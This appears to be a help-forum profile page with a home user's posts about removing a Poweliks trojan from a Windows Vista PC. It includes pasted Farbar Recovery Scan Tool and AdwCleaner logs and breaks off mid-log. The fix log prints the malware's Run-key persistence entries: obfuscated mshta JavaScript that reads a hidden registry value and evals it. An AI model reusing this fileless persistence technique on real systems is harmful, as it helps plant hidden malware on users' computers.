rxwatson

Members
  • Content Count

    8
  • Joined

  • Last visited

Community Reputation

0 Neutral

About rxwatson

  • Rank
    Newbie
  1. I did a system restore to the restore point created by FRST.exe which was before the eset online scan. It was a successful restore so although I don't know what was deleted by eset online scan I must assume they have been restored. I can also access internet explorer which pleases me. I redid the fix on FRST with the original fixlist.txt without problem. Every full scan I've done on Ad-Aware has taken at least three hours and has come up with the viruses. I would assume that the viruses would also be restored but on a much shorter full scan I come up clean with no viruses. The software said I had not done a scan for a long time so I would think it would take the usual three hours. It took one hour and thirty nine minutes. There is one Quarantined item called Gen:Variant.Application at c:\users\roxanne\appdata\local\temp\tmp9334685\setup.exe which I have deleted. I have downloaded the Rkill, Iexplore and ESET Poweliks Cleaner programs again from Bleeping Computer and will keep them for a time till I know I am out of the woods. If you tell me my Ad-Aware program is okay doing much shorter full scans, I will take you at your word and assume I am protected. In one of the instruction sites you gave me, it recommended that after removal of the viruses I should do a scan with Secunia PSI to see what other programs might be vulnerable to viruses. I have this program. It is one of the programs that needs Internet Explorer. I have listed the https://*.secunia.com site as a trusted site to allow it to scan my software and download updated programs. It attempts to scan and download program vulnerabilities but it goes through the sequence fast and does nothing. It isn't working. I believe Ad-Aware firewall is not letting it work. Is there any way to list a trusted site in Ad-Aware
  2. I just requested another full scan on Ad-Aware and it lasted 11 minutes my software isn't working and I've tried repair and reinstalling it. I have no working virus protection now.
  3. I have had quite a time. First of all as none of the three scans done on eset online scanner completed the scan to the end there was no log file generated into the directory you indicated. I have no idea what was deleted I have followed the instructions at Bleeping Computer. The Rkill program stopped a Windows process and two Internet Explorer.exe processes to help in removing the virus. I then ran eset poweliks cleaner which returned with a report that no Trojan Poweliks virus was found. I have attached a copy. I rebooted and found that I no longer am able to run Internet Explorer. The application exe file is no longer in the Internet Explorer directory. While I don't use Internet Explorer for browsing. I have programs which need it to operate. I attempted to download it from Microsoft to reinstall it and it wont reinstall as the version on my computer is more current than the version 9 program from Microsoft. The registry root directory still thinks I have it but it is not listed in software. I can still access the internet options from the program through control panel but can't run the program. There is no way to uninstall internet explorer so I can reinstall thew earlier version. I am without ideas to fix my registry which is now corrupt. I also attempted to run a full scan through Ad-Aware and couldn't get the full scan to run longer than 15 minutes. I attempted to repair it. I uninstalled and reinstalled it without fixing the problem. I had to do a system restore and then run the repair tool to get it to run a longer full scan. The full scan report came back reflecting no Trojan Poweliks viruses the scan still didn't run as long as the full scan did before. I don't know if I can trust the results. Programs load a little faster and I am not seeing miscellaneous other phenomena but I don't know Before I started this process I did a full scan and in addition to the two Trojan.poweliks.gen.1 and the Trojan.poweliks.gen.2 at windows/system32/regsver32.exe there was also a Trojan.poweliks.gen.2 at internet explorer. I think that internet explorer is where the viruses were located. I used to get notification that internet explorer had been closed to protect my computer when I had not had the program open I am not impressed with the eset scanning programs. my computer is not the same. I don't know how to resolve. I have attached new copies of the FRST scan FRST and Addition txt files. I await your reply ESETPoweliksCleaner.exe_20160829.161119.8600.log FRST.txt Addition.txt
  4. I removed McAfee Security Center as it never found anything on any of its scans. Now I only have Ad-Aware installed. I did another full scan to see if the viruses would delete. I still have two Trojan.Poweliks.Gen.1 that will not delete on reboot and now have C\windows\system32\regsvr32.exe infected with Trojan.Poweliks.Gen.2 which would not disinfect. I can attach logs from that scan if you need them but the service log is again too big to upload. Below is the contents of fixlog.txt and I have attached a copy of the file Fix result of Farbar Recovery Scan Tool (x86) Version: 27-08-2016 Ran by Roxanne (27-08-2016 20:03:34) Run:2 Running from C:\Users\Roxanne\Desktop Loaded Profiles: IUSR_NMPR & Roxanne (Available Profiles: IUSR_NMPR & Roxanne) Boot Mode: Normal ============================================== fixlist content: ***************** CreateRestorePoint: CloseProcesses: HKLM\...\Run: [**yycq<*>] => "C:\Windows\system32\mshta.exe" javascript:xa3uPRY3w="LRUvoG";Sb23=new%20ActiveXObject("WScript.Shell");P4VYE="3kcO4dX";IIdd67=Sb23.RegRead("HKLM\\software\\tusf\\qqjz");U8cwmKBJ="1A";eval(IIdd67);xUT (the data entry has 11 more characters). <===== ATTENTION (Value Name with invalid characters) HKLM\...\Run: [] => [X] HKU\S-1-5-21-1191959822-635995572-3245679226-1004\...\Run: [**yycq<*>] => "C:\Windows\system32\mshta.exe" javascript:iodk7Zd="pH";N0G=new%20ActiveXObject("WScript.Shell");sll0jk6V="v1pUr8";n92YYW=N0G.RegRead("HKCU\\software\\tusf\\qqjz");RVRiGBL9="cJwOgj4";eval(n92YYW);z2y7 (the data entry has 11 more characters). <===== ATTENTION (Value Name with invalid characters) HKU\S-1-5-21-1191959822-635995572-3245679226-1004\...\Run: [**xaovjuup<*>] => "C:\Users\Roxanne\AppData\Local\aca060\9dbc1b.lnk" <===== ATTENTION (Value Name with invalid characters) HKU\S-1-5-21-1191959822-635995572-3245679226-1004\...\Run: [**fatcxwjhf<*>] => "C:\Users\Roxanne\AppData\Local\e352a3\4669a2.lnk" <===== ATTENTION (Value Name with invalid characters) HKU\S-1-5-21-1191959822-635995572-3245679226-1004\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 HKU\S-1-5-21-1191959822-635995572-3245679226-1004\...\MountPoints2: {90359ed1-09a0-11de-88a1-806e6f6e6963} - E:\setup.exe BHO: No Name -> {27B4851A-3207-45A2-B947-BE8AFE6163AB} -> No File Toolbar: HKU\S-1-5-21-1191959822-635995572-3245679226-1004 -> No Name - {F2E259E8-0FC8-438C-A6E0-342DD80FA53E} - No File Toolbar: HKU\S-1-5-21-1191959822-635995572-3245679226-1004 -> No Name - {472734EA-242A-422B-ADF8-83D1E48CC825} - No File FF Keyword.URL: hxxps://search.yahoo.com/search?fr=greentree_ff1&ei=utf-8&ilc=12&type=531140&p= FF user.js: detected! => C:\Users\Roxanne\AppData\Roaming\Mozilla\Firefox\Profiles\9u6nzhkj.default\user.js [2016-08-06] SearchScopes: HKU\S-1-5-21-1191959822-635995572-3245679226-1004 -> {BAEB43E1-D0AA-40E5-9988-6620B0D1E678} URL = hxxps://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=531140&p={searchTerms} CHR Plugin: (Shockwave Flash) - C:\Program Files\Google\Chrome\Application\49.0.2623.112\gcswf32.dll => No File CHR Plugin: (Shockwave Flash) - C:\Windows\system32\Macromed\Flash\NPSWF32.dll => No File CHR Plugin: (QuickTime Plug-in 7.6.5) - C:\Program Files\Mozilla Firefox\plugins\npqtplugin.dll => No File CHR Plugin: (QuickTime Plug-in 7.6.5) - C:\Program Files\Mozilla Firefox\plugins\npqtplugin2.dll => No File CHR Plugin: (QuickTime Plug-in 7.6.5) - C:\Program Files\Mozilla Firefox\plugins\npqtplugin3.dll => No File CHR Plugin: (QuickTime Plug-in 7.6.5) - C:\Program Files\Mozilla Firefox\plugins\npqtplugin4.dll => No File CHR Plugin: (QuickTime Plug-in 7.6.5) - C:\Program Files\Mozilla Firefox\plugins\npqtplugin5.dll => No File CHR Plugin: (QuickTime Plug-in 7.6.5) - C:\Program Files\Mozilla Firefox\plugins\npqtplugin6.dll => No File CHR Plugin: (QuickTime Plug-in 7.6.5) - C:\Program Files\Mozilla Firefox\plugins\npqtplugin7.dll => No File CHR Plugin: (Java Deployment Toolkit 6.0.180.7) - C:\Program Files\Mozilla Firefox\plugins\npdeploytk.dll => No File CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll => No File CHR Plugin: (Silverlight Plug-In) - c:\Program Files\Microsoft Silverlight\4.0.60531.0\npctrl.dll => No File CHR Plugin: (RealPlayer Version Plugin) - C:\Program Files\Mozilla Firefox\plugins\nprpjplug.dll => No File CHR Plugin: (RealNetworks RealPlayer Chrome Background Extension Plug-In (32-bit) ) - C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprpchromebrowserrecordext.dll => No File CHR Plugin: (RealPlayer HTML5VideoShim Plug-In (32-bit) ) - C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprphtml5videoshim.dll => No File CHR Plugin: (Chrome NaCl) - C:\Program Files\Google\Chrome\Application\49.0.2623.112\ppGoogleNaClPluginChrome.dll => No File CHR Plugin: (Chrome PDF Viewer) - C:\Program Files\Google\Chrome\Application\49.0.2623.112\pdf.dll => No File CHR Plugin: (downloadUpdater) - C:\Program Files\Mozilla Firefox\plugins\npdnu.dll => No File CHR Plugin: (downloadUpdater2) - C:\Program Files\Mozilla Firefox\plugins\npdnupdater2.dll => No File CHR Plugin: (RealJukebox NS Plugin) - C:\Program Files\Mozilla Firefox\plugins\nprjplug.dll => No File S2 SessionLauncher; no ImagePath S0 Lbd; system32\DRIVERS\Lbd.sys [X] S2 MCSTRM; no ImagePath U3 mfeavfk01; no ImagePath Task: {0DEC8C76-95E6-429A-860F-39945A40E236} - \{697033CB-D98F-4F82-BECD-40D174712EEB} -> No File <==== ATTENTION Task: {1C32D842-1FEC-4AF2-B53E-93C7BF2C2C36} - System32\Tasks\DistromaticUpdater-periodic => C:\Program Files\Amazon Browser Settings\updater.exe [2016-08-06] (Distromatic) <==== ATTENTION Task: {21F17504-CD85-4DDC-B682-1E62E98E3EF6} - System32\Tasks\DistromaticUpdater-logon => C:\Program Files\Amazon Browser Settings\updater.exe [2016-08-06] (Distromatic) <==== ATTENTION Task: {74C453CB-BDFD-4B36-B567-9BA476DF9245} - \{8324A8E3-A69F-48EE-8F04-27DED3B692F2} -> No File <==== ATTENTION Task: {9B8355B4-3096-4276-B998-80FD8D5F5511} - System32\Tasks\DistromaticSearchProtect-logon => C:\Program Files\Amazon Browser Settings\AmznSearchProtect.exe [2016-08-06] (Distromatic) <==== ATTENTION Task: {C884FB2F-7787-4F29-BB71-B265BECC22FD} - System32\Tasks\DistromaticSearchProtect-hourly => C:\Program Files\Amazon Browser Settings\AmznSearchProtect.exe [2016-08-06] (Distromatic) <==== ATTENTION Task: {C92983BD-BACC-4AAC-B0D6-6B41657D33B7} - \{6B526980-99E2-4EAC-8EC9-6D7E937B3A59} -> No File <==== ATTENTION Task: {F97C2168-DAD0-4E72-BE8E-A993CF54DE2C} - \{B3EAF79A-90C9-4E46-8530-7F1D36C56A95} -> No File <==== ATTENTION AlternateDataStreams: C:\ProgramData\TEMP:430C6D84 [127] AlternateDataStreams: C:\ProgramData\TEMP:A8ADE5D8 [109] AlternateDataStreams: C:\ProgramData\TEMP:A9662AE0 [528] AlternateDataStreams: C:\ProgramData\TEMP:CD060F93 [212] AlternateDataStreams: C:\ProgramData\TEMP:DFC5A2B2 [109] IE trusted site: HKU\.DEFAULT\...\localhost -> localhost IE trusted site: HKU\.DEFAULT\...\webcompanion.com -> hxxp://webcompanion.com IE trusted site: HKU\S-1-5-21-1191959822-635995572-3245679226-1004\...\internet -> internet IE trusted site: HKU\S-1-5-21-1191959822-635995572-3245679226-1004\...\localhost -> localhost IE trusted site: HKU\S-1-5-21-1191959822-635995572-3245679226-1004\...\mcafee.com -> hxxp://mcafee.com IE trusted site: HKU\S-1-5-21-1191959822-635995572-3245679226-1004\...\mcafee.com -> hxxps://mcafee.com IE trusted site: HKU\S-1-5-21-1191959822-635995572-3245679226-1004\...\secunia.com -> hxxps://secunia.com IE trusted site: HKU\S-1-5-21-1191959822-635995572-3245679226-1004\...\webcompanion.com -> hxxp://webcompanion.com Folder: C:\Users\Roxanne\AppData\Roaming\aignes Folder: C:\Users\Roxanne\AppData\Roaming\a49916 Folder: C:\Users\Roxanne\AppData\Local\aca060 Reboot: ***************** Restore point was successfully created. Processes closed successfully. HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\**yycq<*> => value not found. HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\ => value removed successfully. HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Windows\CurrentVersion\Run\\**yycq<*> => value removed successfully. HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Windows\CurrentVersion\Run\\**xaovjuup<*> => value removed successfully. HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Windows\CurrentVersion\Run\\**fatcxwjhf<*> => value not found. HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoLowDiskSpaceChecks => value removed successfully. "HKU\S-1-5-21-1191959822-635995572-3245679226-1004\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{90359ed1-09a0-11de-88a1-806e6f6e6963}" => key removed successfully. HKCR\CLSID\{90359ed1-09a0-11de-88a1-806e6f6e6963} => key not found. "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{27B4851A-3207-45A2-B947-BE8AFE6163AB}" => key removed successfully. HKCR\CLSID\{27B4851A-3207-45A2-B947-BE8AFE6163AB} => key not found. HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{F2E259E8-0FC8-438C-A6E0-342DD80FA53E} => value removed successfully. HKCR\CLSID\{F2E259E8-0FC8-438C-A6E0-342DD80FA53E} => key not found. HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{472734EA-242A-422B-ADF8-83D1E48CC825} => value removed successfully. HKCR\CLSID\{472734EA-242A-422B-ADF8-83D1E48CC825} => key not found. Firefox "Keyword.URL" removed successfully. C:\Users\Roxanne\AppData\Roaming\Mozilla\Firefox\Profiles\9u6nzhkj.default\user.js => moved successfully "HKU\S-1-5-21-1191959822-635995572-3245679226-1004\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BAEB43E1-D0AA-40E5-9988-6620B0D1E678}" => key removed successfully. HKCR\CLSID\{BAEB43E1-D0AA-40E5-9988-6620B0D1E678} => key not found. C:\Program Files\Google\Chrome\Application\49.0.2623.112\gcswf32.dll => not found. C:\Windows\system32\Macromed\Flash\NPSWF32.dll => not found. C:\Program Files\Mozilla Firefox\plugins\npqtplugin.dll => not found. C:\Program Files\Mozilla Firefox\plugins\npqtplugin2.dll => not found. C:\Program Files\Mozilla Firefox\plugins\npqtplugin3.dll => not found. C:\Program Files\Mozilla Firefox\plugins\npqtplugin4.dll => not found. C:\Program Files\Mozilla Firefox\plugins\npqtplugin5.dll => not found. C:\Program Files\Mozilla Firefox\plugins\npqtplugin6.dll => not found. C:\Program Files\Mozilla Firefox\plugins\npqtplugin7.dll => not found. C:\Program Files\Mozilla Firefox\plugins\npdeploytk.dll => not found. C:\Program Files\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll => not found. c:\Program Files\Microsoft Silverlight\4.0.60531.0\npctrl.dll => not found. C:\Program Files\Mozilla Firefox\plugins\nprpjplug.dll => not found. C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprpchromebrowserrecordext.dll => not found. C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprphtml5videoshim.dll => not found. C:\Program Files\Google\Chrome\Application\49.0.2623.112\ppGoogleNaClPluginChrome.dll => not found. C:\Program Files\Google\Chrome\Application\49.0.2623.112\pdf.dll => not found. C:\Program Files\Mozilla Firefox\plugins\npdnu.dll => not found. C:\Program Files\Mozilla Firefox\plugins\npdnupdater2.dll => not found. C:\Program Files\Mozilla Firefox\plugins\nprjplug.dll => not found. SessionLauncher => service removed successfully. Lbd => service removed successfully. MCSTRM => service removed successfully. mfeavfk01 => service not found. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0DEC8C76-95E6-429A-860F-39945A40E236}" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0DEC8C76-95E6-429A-860F-39945A40E236}" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{697033CB-D98F-4F82-BECD-40D174712EEB}" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1C32D842-1FEC-4AF2-B53E-93C7BF2C2C36}" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1C32D842-1FEC-4AF2-B53E-93C7BF2C2C36}" => key removed successfully. C:\Windows\System32\Tasks\DistromaticUpdater-periodic => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DistromaticUpdater-periodic" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{21F17504-CD85-4DDC-B682-1E62E98E3EF6}" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{21F17504-CD85-4DDC-B682-1E62E98E3EF6}" => key removed successfully. C:\Windows\System32\Tasks\DistromaticUpdater-logon => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DistromaticUpdater-logon" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{74C453CB-BDFD-4B36-B567-9BA476DF9245}" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{74C453CB-BDFD-4B36-B567-9BA476DF9245}" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{8324A8E3-A69F-48EE-8F04-27DED3B692F2}" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{9B8355B4-3096-4276-B998-80FD8D5F5511}" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9B8355B4-3096-4276-B998-80FD8D5F5511}" => key removed successfully. C:\Windows\System32\Tasks\DistromaticSearchProtect-logon => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DistromaticSearchProtect-logon" => key removed successfully. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C884FB2F-7787-4F29-BB71-B265BECC22FD} => key not found. C:\Windows\System32\Tasks\DistromaticSearchProtect-hourly => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DistromaticSearchProtect-hourly" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C92983BD-BACC-4AAC-B0D6-6B41657D33B7}" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C92983BD-BACC-4AAC-B0D6-6B41657D33B7}" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{6B526980-99E2-4EAC-8EC9-6D7E937B3A59}" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F97C2168-DAD0-4E72-BE8E-A993CF54DE2C}" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F97C2168-DAD0-4E72-BE8E-A993CF54DE2C}" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{B3EAF79A-90C9-4E46-8530-7F1D36C56A95}" => key removed successfully. C:\ProgramData\TEMP => ":430C6D84" ADS removed successfully.. C:\ProgramData\TEMP => ":A8ADE5D8" ADS removed successfully.. C:\ProgramData\TEMP => ":A9662AE0" ADS removed successfully.. C:\ProgramData\TEMP => ":CD060F93" ADS removed successfully.. C:\ProgramData\TEMP => ":DFC5A2B2" ADS removed successfully.. "HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\localhost" => key removed successfully. "HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com" => key removed successfully. "HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\internet" => key removed successfully. "HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\localhost" => key removed successfully. "HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\mcafee.com" => key removed successfully. HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\mcafee.com => key not found. "HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\secunia.com" => key removed successfully. "HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com" => key removed successfully. ========================= Folder: C:\Users\Roxanne\AppData\Roaming\aignes ======================== 2016-08-06 20:18 - 2016-08-06 20:18 - 0000000 ____D () C:\Users\Roxanne\AppData\Roaming\aignes\AM-DeadLink 2016-08-06 20:18 - 2016-08-16 17:57 - 0000797 _____ () C:\Users\Roxanne\AppData\Roaming\aignes\AM-DeadLink\deadlink.ini 2016-08-06 20:18 - 2016-08-16 17:56 - 0000000 ____D () C:\Users\Roxanne\AppData\Roaming\aignes\AM-DeadLink\data 2016-08-06 20:18 - 2016-08-16 17:57 - 0064854 _____ () C:\Users\Roxanne\AppData\Roaming\aignes\AM-DeadLink\data\Internet Explorer.dat 2016-08-16 17:56 - 2016-08-16 17:56 - 0000000 _____ () C:\Users\Roxanne\AppData\Roaming\aignes\AM-DeadLink\data\Mozilla.dat ====== End of Folder: ====== ========================= Folder: C:\Users\Roxanne\AppData\Roaming\a49916 ======================== ====== End of Folder: ====== ========================= Folder: C:\Users\Roxanne\AppData\Local\aca060 ======================== ====== End of Folder: ====== The system needed a reboot. ==== End of Fixlog 20:04:07 ==== Below is a copy of the AdwCleaner Logfile and I have attached a copy of the file # AdwCleaner v6.010 - Logfile created 27/08/2016 at 20:22:16 # Updated on 12/08/2016 by ToolsLib # Database : 2016-08-27.1 [server] # Operating System : Windows Vista Home Premium Service Pack 2 (X86) # Username : Roxanne - HOME-PC # Running from : C:\Users\Roxanne\Desktop\AdwCleaner.exe # Mode: Scan # Support : https://toolslib.net/forum ***** [ Services ] ***** Service Found: YahooAUService Service Found: swdumon ***** [ Folders ] ***** Folder Found: C:\Users\Roxanne\AppData\Local\Amazon Browser Settings Folder Found: C:\Users\Roxanne\AppData\Local\slimware utilities inc Folder Found: C:\Users\Roxanne\AppData\Roaming\Speedbit Folder Found: C:\Users\Roxanne\Favorites\Coupons Folder Found: C:\Users\Roxanne\AppData\Roaming\Mozilla\Firefox\Profiles\9u6nzhkj.default\StumbleUpon Folder Found: C:\ProgramData\Speedbit Folder Found: C:\ProgramData\tencent Folder Found: C:\ProgramData\Viewpoint Folder Found: C:\ProgramData\lavasoft\web companion Folder Found: C:\ProgramData\Tencent Folder Found: C:\ProgramData\Application Data\Speedbit Folder Found: C:\ProgramData\Application Data\tencent Folder Found: C:\ProgramData\Application Data\Viewpoint Folder Found: C:\ProgramData\Application Data\lavasoft\web companion Folder Found: C:\ProgramData\Application Data\Tencent Folder Found: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FLV Player Folder Found: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SpeedOptimizer Folder Found: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pogo Games Folder Found: C:\Users\Public\Documents\Downloaded Installers Folder Found: C:\Program Files\Amazon Browser Settings Folder Found: C:\Program Files\DAP Folder Found: C:\Program Files\FLV Player Folder Found: C:\Program Files\SpeedOptimizer Folder Found: C:\Program Files\tencent Folder Found: C:\Program Files\Viewpoint Folder Found: C:\Program Files\Tencent Folder Found: C:\Program Files\Common Files\Software Update Utility Folder Found: C:\Users\Roxanne\AppData\Roaming\Mozilla\Firefox\Profiles\9u6nzhkj.default\extensions\{635abd67-4fe9-1b23-4f01-e679fa7484c1} ***** [ Files ] ***** File Found: C:\Users\Roxanne\AppData\Local\Microsoft\Internet Explorer\DOMStore\JB0A0IX4\internetspeedtracker.dl.myway[1].xml File Found: C:\Users\Roxanne\AppData\Local\Microsoft\Internet Explorer\DOMStore\4UQ34PHN\allin1convert.dl.myway[1].xml File Found: C:\Users\Roxanne\AppData\Local\Microsoft\Internet Explorer\DOMStore\4UQ34PHN\fromdoctopdf.dl.myway[1].xml File Found: C:\Users\Roxanne\AppData\Local\Microsoft\Internet Explorer\DOMStore\4UQ34PHN\www.citysearch[1].xml File Found: C:\Users\Roxanne\AppData\Local\Microsoft\Internet Explorer\DOMStore\4UQ34PHN\www.zwinky[1].xml File Found: C:\Windows\system32\lavasofttcpservice.dll File Found: C:\Windows\system32\LavasoftTcpServiceOff.ini File Found: C:\Windows\system32\drivers\swdumon.sys File Found: C:\Windows\system32\drivers\SWDUMon.sys File Found: C:\Users\Roxanne\AppData\Roaming\Mozilla\Firefox\Profiles\9u6nzhkj.default\extensions\[email protected] File Found: C:\Users\Roxanne\AppData\Roaming\Mozilla\Firefox\Profiles\9u6nzhkj.default\searchplugins\bing-lavasoft.xml ***** [ DLL ] ***** No malicious DLLs found. ***** [ WMI ] ***** No malicious keys found. ***** [ Shortcuts ] ***** No infected shortcut found. ***** [ Scheduled Tasks ] ***** No malicious task found. ***** [ Registry ] ***** Key Found: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\citysearch.com Key Found: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\myway.com Key Found: HKLM\SOFTWARE\Classes\AniGIFCtrl.AniGIF Key Found: HKLM\SOFTWARE\Classes\AniGIFPpg.AniGIFPpg Key Found: HKLM\SOFTWARE\Classes\AniGIFPpg.AniGIFPpg.1 Key Found: HKLM\SOFTWARE\Classes\AniGIFPpg2.AniGIFPpg2 Key Found: HKLM\SOFTWARE\Classes\AniGIFPpg2.AniGIFPpg2.1 Key Found: HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtl Key Found: HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtl.1 Key Found: HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtlSecondary Key Found: HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtlSecondary.1 Key Found: HKLM\SOFTWARE\Classes\dnUpdate Key Found: HKLM\SOFTWARE\Classes\dnUpdater.DownloadUIBrowser Key Found: HKLM\SOFTWARE\Classes\dnUpdater.DownloadUIBrowser.1 Key Found: HKLM\SOFTWARE\Classes\dnUpdater.DownloadUpdController Key Found: HKLM\SOFTWARE\Classes\dnUpdater.DownloadUpdController.1 Key Found: HKLM\SOFTWARE\Classes\IncrediSpooler.DeltaSync Key Found: HKLM\SOFTWARE\Classes\IncrediSpooler.DeltaSync.1 Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataContainer Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataContainer.1 Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataController Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataController.1 Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTable Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTable.1 Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTableFields Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTableFields.1 Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTableHolder Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTableHolder.1 Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.LSPLogic Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.LSPLogic.1 Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.ReadOnlyManager Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.ReadOnlyManager.1 Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.WFPController Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.WFPController.1 Key Found: HKLM\SOFTWARE\Classes\PPSShapeCollection.PS10ArrowTool Key Found: HKLM\SOFTWARE\Classes\PPSShapeCollection.PS10ArrowTool.1 Key Found: HKLM\SOFTWARE\Classes\protector_dll.Protector Key Found: HKLM\SOFTWARE\Classes\protector_dll.Protector.1 Key Found: HKLM\SOFTWARE\Classes\protector_dll.ProtectorLib Key Found: HKLM\SOFTWARE\Classes\protector_dll.ProtectorLib.1 Key Found: HKLM\SOFTWARE\Classes\PSActivityPanes.PSTextPane Key Found: HKLM\SOFTWARE\Classes\PSActivityPanes.PSTextPane.1 Key Found: HKLM\SOFTWARE\Classes\Sample.BrowserHandler Key Found: HKLM\SOFTWARE\Classes\Sample.BrowserHandler.1 Key Found: HKLM\SOFTWARE\Classes\Sample.YTBPartnerSample Key Found: HKLM\SOFTWARE\Classes\Sample.YTBPartnerSample.1 Key Found: HKLM\SOFTWARE\Classes\AppID\{6C259840-5BA8-46E6-8ED1-EF3BA47D8BA1} Key Found: HKLM\SOFTWARE\Classes\AppID\{7375D127-3955-4654-8E7D-1949A7A9C902} Key Found: HKLM\SOFTWARE\Classes\CLSID\{03F998B2-0E00-11D3-A498-00104B6EB52E} Key Found: 